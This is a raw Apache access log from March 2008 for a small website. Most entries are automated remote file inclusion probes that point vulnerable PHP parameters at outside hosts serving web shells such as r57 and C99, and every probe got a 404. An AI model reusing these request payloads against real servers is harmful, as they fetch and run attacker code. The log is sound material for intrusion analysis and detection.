213.193.222.176 - - [16/Mar/2008:07:39:14 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:07:39:14 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:40:06 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.188.77 - - [16/Mar/2008:07:40:08 -0700] "GET //index.php?id=&page=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:07:40:28 -0700] "GET /logs/access_071229.log//login.php?dir=http://unisel.t35.com/r57i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:07:40:28 -0700] "GET //login.php?dir=http://unisel.t35.com/r57i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:07:40:28 -0700] "GET /logs//login.php?dir=http://unisel.t35.com/r57i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:07:40:35 -0700] "GET /logs/access_071229.log//login.php?dir=http://unisel.t35.com/r57i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:07:40:35 -0700] "GET //login.php?dir=http://unisel.t35.com/r57i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:07:40:35 -0700] "GET /logs//login.php?dir=http://unisel.t35.com/r57i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.247.44.96 - - [16/Mar/2008:07:41:19 -0700] "GET /logs/access_080225.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.247.44.96 - - [16/Mar/2008:07:41:20 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:07:41:22 -0700] "GET /logs/access_080117.log//login.php?dir=http://unisel.t35.com/r57i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.24.58 - - [16/Mar/2008:07:41:32 -0700] "GET /logs/access_080117.log//login.php?dir=http://unisel.t35.com/r57i.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.86.80.16 - - [16/Mar/2008:07:42:11 -0700] "GET /logs/access_080129.log//mambots/administrator/components/com_swmenupro//components/com_mosmedia/index.php?path=http://www.aeromexicov.org/galeria/backups/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.86.80.16 - - [16/Mar/2008:07:42:11 -0700] "GET /logs//mambots/administrator/components/com_swmenupro//components/com_mosmedia/index.php?path=http://www.aeromexicov.org/galeria/backups/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:07:42:39 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.134.186 - - [16/Mar/2008:07:43:35 -0700] "GET /logs/access_080225.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:43:37 -0700] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:43:38 -0700] "GET /logs/access_080120.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.134.186 - - [16/Mar/2008:07:43:39 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.143.186.32 - - [16/Mar/2008:07:44:57 -0700] "GET /logs/access_071229.log//login.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [16/Mar/2008:07:44:57 -0700] "GET //login.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [16/Mar/2008:07:44:58 -0700] "GET /logs//login.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.56.111.194 - - [16/Mar/2008:07:45:31 -0700] "GET /logs/access_080117.log//index.php?id=&page=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.56.111.194 - - [16/Mar/2008:07:45:32 -0700] "GET /logs//index.php?id=&page=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.68.203.22 - - [16/Mar/2008:07:45:55 -0700] "GET /logs/access_080225.log/%5Cecommerce%5Cpayment%5Ccybersource.php?path[docroot]=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.68.203.22 - - [16/Mar/2008:07:45:55 -0700] "GET /logs/%5Cecommerce%5Cpayment%5Ccybersource.php?path[docroot]=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [16/Mar/2008:07:45:58 -0700] "GET /logs/access_080117.log//login.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.64.104 - - [16/Mar/2008:07:46:18 -0700] "GET /logs/index.php?go1=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.64.104 - - [16/Mar/2008:07:46:19 -0700] "GET /index.php?go1=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.24.251.240 - - [16/Mar/2008:07:46:20 -0700] "GET /presto/ HTTP/1.1" 200 526 "http://home.earthlink.net/~infernofilecabinet2/XpSetupsF_J/JourneyPII_Setup.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
62.24.251.240 - - [16/Mar/2008:07:46:22 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
72.233.60.90 - - [16/Mar/2008:07:48:03 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://veldega-tour.ru/.log/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.233.60.90 - - [16/Mar/2008:07:48:03 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://veldega-tour.ru/.log/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.233.60.90 - - [16/Mar/2008:07:48:21 -0700] "GET /logs/access_080119.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://veldega-tour.ru/.log/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.24.251.240 - - [16/Mar/2008:07:48:27 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
62.24.251.240 - - [16/Mar/2008:07:48:38 -0700] "GET / HTTP/1.1" 200 3094 "http://www.dmulk.com/presto/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
216.143.186.32 - - [16/Mar/2008:07:48:48 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [16/Mar/2008:07:48:48 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [16/Mar/2008:07:48:48 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.24.251.242 - - [16/Mar/2008:07:48:49 -0700] "GET /mobilehackers/ HTTP/1.1" 401 395 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
217.107.222.77 - - [16/Mar/2008:07:48:57 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.kasaworld.com/bbs//skin/data/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.107.222.77 - - [16/Mar/2008:07:48:57 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.kasaworld.com/bbs//skin/data/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.107.222.77 - - [16/Mar/2008:07:48:57 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.kasaworld.com/bbs//skin/data/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.24.251.241 - - [16/Mar/2008:07:48:58 -0700] "GET /tools/ HTTP/1.1" 200 12404 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
62.24.251.240 - - [16/Mar/2008:07:48:59 -0700] "GET /funny/ HTTP/1.1" 200 808 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
62.24.251.240 - - [16/Mar/2008:07:48:59 -0700] "GET /tools/css/phpmyadmin.css.php?lang=en&js_frame=right&js_isDOM=1 HTTP/1.1" 200 12256 "http://www.dmulk.com/tools/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
62.24.251.242 - - [16/Mar/2008:07:49:00 -0700] "GET /tools/themes/original/img/vertical_line.png HTTP/1.1" 200 83 "http://www.dmulk.com/tools/css/phpmyadmin.css.php?lang=en&js_frame=right&js_isDOM=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
62.24.251.240 - - [16/Mar/2008:07:49:00 -0700] "GET /tools/themes/original/img/logo_right.png HTTP/1.1" 200 5658 "http://www.dmulk.com/tools/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:49:30 -0700] "GET /logs/access_080124.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.188.77 - - [16/Mar/2008:07:49:44 -0700] "GET /logs/access_080117.log//index.php?id=&page=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.172.188.77 - - [16/Mar/2008:07:49:45 -0700] "GET /logs//index.php?id=&page=http://www.techbomb.com/fastmicrowave/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.24.251.240 - - [16/Mar/2008:07:49:53 -0700] "GET /_private/ HTTP/1.1" 403 163 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
62.24.251.240 - - [16/Mar/2008:07:49:54 -0700] "GET /backup/ HTTP/1.1" 401 395 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
74.6.28.200 - - [16/Mar/2008:07:50:02 -0700] "GET /tmp/sess_9bf0606ed85306a65cf8f71fc5fd75e9 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.24.251.240 - - [16/Mar/2008:07:50:02 -0700] "GET /backup2/ HTTP/1.1" 401 395 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
62.24.251.240 - - [16/Mar/2008:07:50:10 -0700] "GET / HTTP/1.1" 200 3094 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:50:38 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:50:38 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:50:38 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.24.251.240 - - [16/Mar/2008:07:50:40 -0700] "GET /funny/terryt1.wmv HTTP/1.1" 200 4065346 "http://www.dmulk.com/funny/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:51:57 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:51:57 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:51:57 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.247.200 - - [16/Mar/2008:07:52:25 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://veldega-tour.ru/.log/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.166 - - [16/Mar/2008:07:52:50 -0700] "GET /logs/access_080118.log//init_basic.php?GALLERY_BASEDIR=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [16/Mar/2008:07:52:51 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:52:59 -0700] "GET /logs/access_080122.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.133.237 - - [16/Mar/2008:07:53:37 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:54:14 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.162.98 - - [16/Mar/2008:07:54:42 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://course-notes.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
67.212.162.98 - - [16/Mar/2008:07:54:42 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://course-notes.org/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
124.217.247.166 - - [16/Mar/2008:07:55:54 -0700] "GET //mambots/administrator/components/com_swmenupro//components/com_mosmedia/index.php?path=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:56:08 -0700] "GET /logs/access_080225.log/components/com_performs/performs.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:07:56:40 -0700] "GET /logs/database.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
125.233.184.58 - - [16/Mar/2008:07:56:47 -0700] "GET /logs/access_080225.log HTTP/1.1" 200 1499324 "http://tw.search.yahoo.com/search?ei=UTF-8&p=66.249.73.115&pstart=1&fr=yfp&b=21" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
125.233.184.58 - - [16/Mar/2008:07:56:49 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:07:56:51 -0700] "GET /database.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.38.4.3 - - [16/Mar/2008:07:57:31 -0700] "GET /podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.38.4.3 - - [16/Mar/2008:07:57:31 -0700] "GET /logs/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.38.4.3 - - [16/Mar/2008:07:57:31 -0700] "GET /logs/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=http://www.caccolas/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
64.38.4.3 - - [16/Mar/2008:07:57:31 -0700] "GET /podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=http://www.caccolas/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
64.38.4.3 - - [16/Mar/2008:07:57:31 -0700] "GET /logs/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=http://www.roxowner.110mb.com/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.38.4.3 - - [16/Mar/2008:07:57:31 -0700] "GET /podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=http://www.roxowner.110mb.com/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
216.130.191.251 - - [16/Mar/2008:07:57:36 -0700] "GET /logs/access_080131.log//modules/vwar/admin/admin.php?vwar_root=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.50 - - [16/Mar/2008:07:57:51 -0700] "GET /logs/access_080118.log/inc/cmses/aedatingCMS.php?dir[inc]=http://w0rms.by.ru/ddos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.50 - - [16/Mar/2008:07:57:51 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://w0rms.by.ru/ddos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.50 - - [16/Mar/2008:07:57:51 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://w0rms.by.ru/ddos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.190.229 - - [16/Mar/2008:07:58:01 -0700] "GET /logs/access_080207.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
125.233.184.58 - - [16/Mar/2008:07:58:14 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
212.204.230.31 - - [16/Mar/2008:07:58:19 -0700] "GET /logs/access_071229.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.acb.bs.it/moodledata/cache/cmdlist.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.204.230.31 - - [16/Mar/2008:07:58:19 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.acb.bs.it/moodledata/cache/cmdlist.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.204.230.31 - - [16/Mar/2008:07:58:20 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.acb.bs.it/moodledata/cache/cmdlist.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:07:58:22 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.172.174.208 - - [16/Mar/2008:07:58:36 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.55.133.237 - - [16/Mar/2008:07:58:37 -0700] "GET /logs/access_080118.log//init_basic.php?GALLERY_BASEDIR=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.133.237 - - [16/Mar/2008:07:58:37 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.133.237 - - [16/Mar/2008:07:58:38 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.112.47 - - [16/Mar/2008:07:59:04 -0700] "GET /logs/access_080215.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.112.47 - - [16/Mar/2008:07:59:04 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.112.47 - - [16/Mar/2008:07:59:04 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [16/Mar/2008:07:59:21 -0700] "GET /logs/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=http://www.lirik.biz//skins/bobbyzhuo/.debug/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [16/Mar/2008:07:59:21 -0700] "GET /podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=http://www.lirik.biz//skins/bobbyzhuo/.debug/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.112.47 - - [16/Mar/2008:07:59:49 -0700] "GET /logs/access_080118.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.50 - - [16/Mar/2008:07:59:58 -0700] "GET /logs/access_080124.log/inc/cmses/aedatingCMS.php?dir[inc]=http://w0rms.by.ru/ddos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.14.17.111 - - [16/Mar/2008:08:00:35 -0700] "GET /logs/access.log//atom.php5?page=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.14.17.111 - - [16/Mar/2008:08:00:35 -0700] "GET //atom.php5?page=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.14.17.111 - - [16/Mar/2008:08:00:36 -0700] "GET /logs//atom.php5?page=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.124.30.101 - - [16/Mar/2008:08:00:51 -0700] "GET /include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=http://www.cv-trabajo.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
59.124.30.101 - - [16/Mar/2008:08:00:52 -0700] "GET /include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
